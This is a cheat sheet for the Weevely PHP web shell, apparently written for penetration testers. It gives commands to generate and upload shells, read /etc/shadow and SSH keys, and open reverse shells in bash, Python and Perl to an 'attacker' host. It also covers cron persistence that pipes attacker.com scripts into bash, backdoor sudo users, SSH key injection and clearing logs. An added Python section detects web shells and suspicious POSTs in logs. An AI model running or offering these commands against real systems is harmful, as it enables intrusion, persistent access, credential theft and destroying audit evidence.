# Weevely
Stealth PHP web shell with encrypted communication for post-exploitation including command execution, file management, privilege escalation, and lateral movement.
## Overview

Weevely is a stealth PHP web shell that simulates a telnet-like connection for post-exploitation. It provides encrypted bidirectional communication, command execution, file management, and persistence capabilities.

- Category: Web Shells & Post-Exploitation
- Language: PHP
- Communication: AES-256 encrypted HTTPS
## Installation

### Linux/Ubuntu

```bash
# Clone from GitHub
git clone https://github.com/epinna/weevely3.git
cd weevely3

# Install dependencies
sudo apt update
sudo apt install python3 python3-pip git
pip3 install -r requirements.txt

# Make executable
chmod +x weevely.py

# Optional: Create symlink
sudo ln -s $(pwd)/weevely.py /usr/local/bin/weevely
```

### macOS

```bash
# Homebrew installation
brew install weevely

# Manual installation
git clone https://github.com/epinna/weevely3.git
cd weevely3
pip3 install -r requirements.txt
sudo ln -s $(pwd)/weevely.py /usr/local/bin/weevely
```

### From Source

```bash
# Direct from GitHub
git clone https://github.com/epinna/weevely3.git
cd weevely3
python3 -m weevely --help
```
## Basic Commands

| Command | Description |
|---|---|
| `weevely generate <password> <output.php>` | Generate PHP web shell |
| `weevely <URL> <password>` | Connect to deployed shell |
| `weevely --help` | Display help information |
| `weevely --version` | Show version information |
| `weevely <URL> <password> <command>` | Execute single command |
## Web Shell Generation

### Generate Shell

```bash
# Basic shell generation
weevely generate password123 shell.php

# Generate with custom agent name
weevely generate mypassword agent.php

# Generate with obfuscated output
weevely generate securepass shell.php --obfuscate
```

### Shell Variations

```bash
# Generate shell with hardcoded password
weevely generate complex_pass backdoor.php

# Create minimal shell
weevely generate pass minimal.php --slim

# Generate for specific PHP version
weevely generate pass shell.php --php-version 7.4
```
## Deployment

### Upload Methods

```bash
# Via web form (file upload vulnerability)
# Upload shell.php through vulnerable upload form

# Via FTP
ftp targethost.com
put shell.php

# Via SCP
scp shell.php user@target:/var/www/html/

# Via WebDAV
curl -X PUT --data-binary @shell.php http://target.com/shell.php

# Via insecure deserialization or RCE
# Place shell.php in accessible location
```

### Deployment Examples

```bash
# Deploy to WordPress uploads
# Transfer shell.php to /wp-content/uploads/

# Deploy to common locations
/var/www/html/
/var/www/
/home/*/public_html/
/usr/share/nginx/html/

# Verify deployment
curl http://target.com/shell.php
```
## Connection & Session Management

### Connect to Shell

```bash
# Connect to deployed shell
weevely http://target.com/shell.php mypassword

# Connect with custom URL parameter
weevely "http://target.com/shell.php?id=1" password

# Connect through proxy
weevely http://target.com/shell.php pass --proxy http://proxy:8080
```

### Interactive Shell

```
# Once connected, interactive shell starts
:> whoami
:> pwd
:> ls -la
:> help
```

### Single Command Execution

```bash
# Execute command without interactive session
weevely http://target.com/shell.php pass :system whoami

# Piped execution
weevely http://target.com/shell.php pass :system "cat /etc/passwd | head"

# Command with output redirection
weevely http://target.com/shell.php pass :system "id > /tmp/id.txt"
```
## File Management

### File Operations

```
# List directory contents
:> ls -la /home
:> find / -name "*.conf" 2>/dev/null

# Change directory
:> cd /var/www/html
:> pwd

# Display file contents
:> cat /etc/passwd
:> head -50 /var/www/html/config.php
```

### Upload Files

```
# Upload local file
:> upload local_file.txt /tmp/

# Upload with permissions
:> upload exploit.sh /tmp/
:> chmod +x /tmp/exploit.sh

# Upload data exfiltration payload
:> upload data_stealer.py /var/www/
```

### Download Files

```
# Download from target
:> download /etc/passwd

# Download application config
:> download /var/www/html/wp-config.php

# Download multiple files
:> download /etc/shadow
:> download /root/.ssh/id_rsa
```

### File Browsing Module

```
# Use file module for browsing
:> file ls /home

# List with details
:> file ls -la /var/www

# Search for files
:> file find /home -name "*.txt"

# File permissions
:> file chmod 755 /tmp/shell.sh

# Create directories
:> file mkdir /tmp/staging
```
## System Command Execution

### Execute Commands

```
# Basic command execution
:> id
:> whoami
:> hostname

# Enumerate system
:> uname -a
:> cat /etc/os-release
:> lsb_release -a

# Check current privileges
:> sudo -l
:> groups
:> id -G
```

### Information Gathering

```
# Network information
:> ifconfig
:> ip addr show
:> netstat -tuln
:> ss -tuln

# Process enumeration
:> ps aux
:> ps -ef

# Running services
:> systemctl list-units --type=service
:> service --status-all

# Installed software
:> dpkg -l
:> rpm -qa
```

### Shell Access

```
# Spawn reverse shell
:> bash -i >& /dev/tcp/attacker_ip/port 0>&1

# Python reverse shell
:> python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("attacker",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

# Perl reverse shell
:> perl -e 'use Socket;$i="attacker";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
```
## Database Interaction

### SQL Module

```
# List databases
:> sql query "SHOW DATABASES;"

# Select current database
:> sql query "USE wordpress;"

# Enumerate tables
:> sql query "SHOW TABLES;"

# Dump table structure
:> sql query "DESCRIBE wp_users;"

# Extract data
:> sql query "SELECT * FROM wp_users;"

# Extract credentials
:> sql query "SELECT user_login, user_pass FROM wp_users;"
```

### MySQL Enumeration

```
# Check MySQL version
:> sql query "SELECT VERSION();"

# Current user
:> sql query "SELECT USER();"

# File privileges
:> sql query "SELECT load_file('/etc/passwd');"

# Write files
:> sql query "INTO OUTFILE '/var/www/html/shell.php' SELECT '<?php system($_GET[cmd]); ?>';"
```
## Network Pivoting

### Network Reconnaissance

```
# Scan internal network
:> nmap -sV 192.168.1.0/24

# Port scanning
:> netstat -tuln | grep LISTEN
:> ss -tuln

# DNS resolution
:> nslookup internal-server
:> host internal.local
```

### Lateral Movement

```
# Upload lateral movement tools
:> upload mimikatz.exe /tmp/
:> upload plink.exe /tmp/

# Proxy through shell for pivoting
weevely http://target.com/shell.php pass --proxy

# Create tunnel
:> ssh -D 1080 pivot@internal-host
```
## Privilege Escalation

### Enumeration

```
# Check sudo access
:> sudo -l

# Find SUID binaries
:> find / -perm -4000 2>/dev/null

# Check capabilities
:> getcap -r / 2>/dev/null

# Kernel version
:> uname -r

# Writable locations
:> find / -writable 2>/dev/null | grep -v proc
```

### Exploitation

```
# Using system module
:> system sudoers

# Check cron jobs
:> cat /etc/crontab
:> ls -la /etc/cron.d/

# Upload exploit
:> upload linux-exploit.c /tmp/
:> gcc /tmp/linux-exploit.c -o /tmp/exploit
:> /tmp/exploit
```
## Persistence Techniques

### Create Backdoor Users

```
# Add new user (requires root)
:> useradd -m -s /bin/bash backdoor
:> echo "backdoor:password123" | chpasswd

# Add to sudo
:> echo "backdoor ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
```

### Cron Persistence

```
# Add cron job
:> echo "* * * * * /bin/bash -i >& /dev/tcp/attacker/4444 0>&1" | crontab -

# Write to system cron
:> echo "* * * * * root curl http://attacker.com/update.sh | bash" > /etc/cron.d/update
```

### Web Shell Placement

```
# Multiple shells in different locations
:> cp /var/www/html/shell.php /tmp/shell.php
:> cp /var/www/html/shell.php /home/user/shell.php
:> cp /var/www/html/shell.php /var/tmp/shell.php
```

### SSH Key Injection

```
# Add authorized key
:> mkdir -p ~/.ssh
:> echo "ssh-rsa AAAA...key..." >> ~/.ssh/authorized_keys
:> chmod 700 ~/.ssh
:> chmod 600 ~/.ssh/authorized_keys
```
## Obfuscation & OPSEC

### Obfuscation Techniques

```
# Generate obfuscated shell
weevely generate password shell.php --obfuscate

# Custom user agent
:> system "curl -A 'Mozilla/5.0' http://internal.local/check"

# Encode commands
:> base64 sensitive_command
:> echo "Y2F0IC9ldGMvcGFzc3dk" | base64 -d | bash
```

### Stealth Operations

```
# Disable bash history
:> export HISTFILE=/dev/null
:> unset HISTFILE

# Clear logs
:> cat /dev/null > /var/log/auth.log
:> echo "" > /var/log/apache2/access.log

# Remove traces
:> rm -f ~/.bash_history
:> history -c
```

### Traffic Evasion

```
# Use HTTPS for encryption
weevely https://target.com/shell.php password

# Randomize requests
:> system "sleep $((RANDOM % 300)) && curl http://target.com/check"

# Fragment payload
# Break large commands into smaller chunks
```
## Modules Reference

### Audit Module

```
# System audit
:> audit modules

# Check configurations
:> audit disk
:> audit net
```

### Backdoor Module

```
# Create backdoors
:> backdoor

# Web backdoor
:> backdoor shell
```

### Bruteforce Module

```
# Brute force credentials
:> bruteforce ftp
:> bruteforce ssh

# Dictionary attack
:> bruteforce http --wordlist=/path/to/dict
```

### File Module

```
# Advanced file operations
:> file ls
:> file upload
:> file download
:> file cat
:> file chmod
```

### Net Module

```
# Network tools
:> net scan
:> net proxy
:> net dump
```

### SQL Module

```
# Database interaction
:> sql query "SELECT VERSION();"
:> sql dump
:> sql connect
```

### System Module

```
# System operations
:> system info
:> system priv
:> system whoami
```
## Module Usage

### List All Modules

```
:> help
```

### Get Module Help

```
# General help
:> help <module>

# Specific command help
:> <module> --help
```

### Module Examples

```
# File operations
:> file ls /home
:> file upload payload.sh /tmp/
:> file download /etc/passwd

# Network scanning
:> net scan 192.168.1.0/24

# SQL queries
:> sql query "SELECT * FROM users;"

# System information
:> system uname
```
## OPSEC Considerations

### Safe Practices

- Use strong, unique passwords for each shell
- Rotate shells regularly
- Clean up uploaded files and logs
- Use HTTPS over HTTP when possible
- Minimize command output and logging

### Detection Evasion

Blend with legitimate traffic:

- User-Agent rotation
- Timing variations between requests
- Legitimate-looking HTTP headers

File integrity:

- Keep shell permissions consistent
- Use timestamps matching other files
- Avoid suspicious file names
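The defender's counterpart to the placement and evasion notes above. This is an added example, not code from the page or from the Weevely project: it flags PHP files sitting in upload or temp directories that call the functions web shells depend on, and POST requests to `.php` files under those paths in a combined-format access log. The directory list, the function list and the sample file and log lines are constructed assumptions, not indicators taken from a real host.

```python
import re

# Functions PHP web shells lean on; legitimate files in an uploads
# directory almost never call them, so any hit deserves a look.
DANGEROUS_CALLS = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open|"
    r"create_function|base64_decode|str_rot13|gzinflate)\s*\(", re.I)

# Directories that should hold data, not executable code (assumed list,
# based on the deployment locations the cheat sheet names).
UPLOAD_DIRS = ("/wp-content/uploads/", "/uploads/", "/tmp/", "/var/tmp/")

def php_indicators(path, source):
    """Return the dangerous functions called in a .php file that lives under
    a directory where no PHP should execute (empty list otherwise)."""
    if not path.endswith(".php") or not any(d in path for d in UPLOAD_DIRS):
        return []
    return sorted({m.group(1).lower() for m in DANGEROUS_CALLS.finditer(source)})

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) '
    r'[^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def suspicious_requests(lines):
    """Flag POSTs to .php files under upload/temp paths: a shell is driven by
    POST bodies, while real uploads (images, documents) are fetched with GET."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0]
        if (m["method"] == "POST" and path.endswith(".php")
                and any(d in path for d in UPLOAD_DIRS)):
            hits.append({"ip": m["ip"], "path": path, "ua": m["ua"]})
    return hits

if __name__ == "__main__":
    # Constructed samples, not captured from a real system.
    sample_php = "<?php $k='x'; eval(base64_decode($_POST['p'])); ?>"
    print(php_indicators("/var/www/html/wp-content/uploads/shell.php", sample_php))
    sample_log = [
        '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "POST /wp-content/uploads/shell.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
        '10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /wp-content/uploads/photo.jpg HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    ]
    print(suspicious_requests(sample_log))
```

Both checks are heuristics: a legitimate PHP file outside the upload directories produces no hit, and an operator rotating User-Agents or timing (as the evasion list suggests) still leaves the POST-to-PHP-under-uploads pattern visible.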
### Cleanup Operations

```
# Remove shells
:> find / -name "shell.php" -delete

# Clear logs
:> echo "" > /var/log/apache2/access.log
:> truncate -s 0 /var/log/auth.log

# Remove artifacts
:> history -c
:> rm -rf /tmp/uploaded_files
```
## Troubleshooting

### Connection Issues

```
# Verify shell is accessible
curl http://target.com/shell.php

# Check firewall
:> telnet target.com 80

# Proxy issues
weevely http://target.com/shell.php pass --proxy http://proxy:8080
```

### Permission Errors

```
# Check file permissions
:> ls -la /var/www/html/shell.php

# Fix permissions
:> chmod 755 /var/www/html/shell.php

# Check PHP execution
:> apache2ctl status
```

### Module Failures

```
# Verify module availability
:> help

# Check dependencies
:> system "which nmap"
:> system "which curl"

# Update Weevely
git pull
pip3 install -r requirements.txt
```
## Examples

### Initial Access Workflow

```
# 1. Generate shell
weevely generate Complex@Pass2024 shell.php

# 2. Upload through vulnerability
# Use identified file upload, RCE, or misconfig

# 3. Connect and verify
weevely http://target.com/uploads/shell.php Complex@Pass2024

# 4. Enumerate system
:> whoami
:> id
:> uname -a
```

### Post-Exploitation Workflow

```
# 1. Information gathering
:> cat /etc/passwd
:> sudo -l
:> find / -perm -4000 2>/dev/null

# 2. Privilege escalation
:> system "exploit-suggester.sh"
:> gcc /tmp/exploit.c -o /tmp/exploit
:> /tmp/exploit

# 3. Persistence
:> echo "backdoor ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
:> crontab -e # Add reverse shell

# 4. Data exfiltration
:> upload sensitive_data.tar.gz
:> download /home/user/documents/
```

### Lateral Movement Workflow

```
# 1. Enumerate network
:> ifconfig
:> arp -a

# 2. Scan internal network
:> nmap -sV 192.168.1.0/24

# 3. Deploy to discovered hosts
:> scp shell.php user@internal-host:/tmp/

# 4. Create tunnel for pivoting
weevely http://internal-host/tmp/shell.php password
```
## Security References

- OWASP Web Shell Guidelines
- NIST Incident Response Procedures
- CWE-94: Improper Control of Generation of Code
- ATT&CK Framework - Web Shell (T1505.003)
- CVE Database for PHP vulnerabilities